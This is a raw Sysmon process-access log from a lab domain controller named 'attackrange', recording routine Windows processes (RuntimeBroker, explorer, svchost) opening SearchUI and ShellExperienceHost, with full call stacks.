22:52:55.852{05ADC7E1-29F2-6039-CB05-00000000AD01}42808196C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694403Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.852{05ADC7E1-29F2-6039-CB05-00000000AD01}42808196C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694402Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.852{05ADC7E1-1E7A-603D-D07D-00000000AD01}57961296C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+27e9|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001694401Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.852{05ADC7E1-1E7A-603D-D07D-00000000AD01}57961296C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+27e9|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001694400Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.852{05ADC7E1-22AF-6039-2700-00000000AD01}27765668C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+27e9|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001694399Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.852{05ADC7E1-22AF-6039-2700-00000000AD01}27765668C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+27e9|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000001694398Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.851{05ADC7E1-229F-6039-0D00-00000000AD01}6205508C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694397Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.851{05ADC7E1-229F-6039-0D00-00000000AD01}6205508C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694396Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.850{05ADC7E1-229F-6039-0D00-00000000AD01}6204132C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694395Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.850{05ADC7E1-229F-6039-0D00-00000000AD01}6204132C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694394Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.850{05ADC7E1-229F-6039-0D00-00000000AD01}6204132C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694393Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.850{05ADC7E1-229F-6039-0D00-00000000AD01}6204132C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694392Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.850{05ADC7E1-229F-6039-0D00-00000000AD01}6205508C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694391Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.850{05ADC7E1-229F-6039-0D00-00000000AD01}6205508C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694390Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.850{05ADC7E1-229F-6039-0D00-00000000AD01}6204132C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694389Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.850{05ADC7E1-229F-6039-0D00-00000000AD01}6204132C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694388Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.850{05ADC7E1-229F-6039-0D00-00000000AD01}6205508C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694387Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.850{05ADC7E1-229F-6039-0D00-00000000AD01}6205508C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694386Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.849{05ADC7E1-229F-6039-0D00-00000000AD01}6205508C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694385Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.849{05ADC7E1-229F-6039-0D00-00000000AD01}6205508C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694384Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 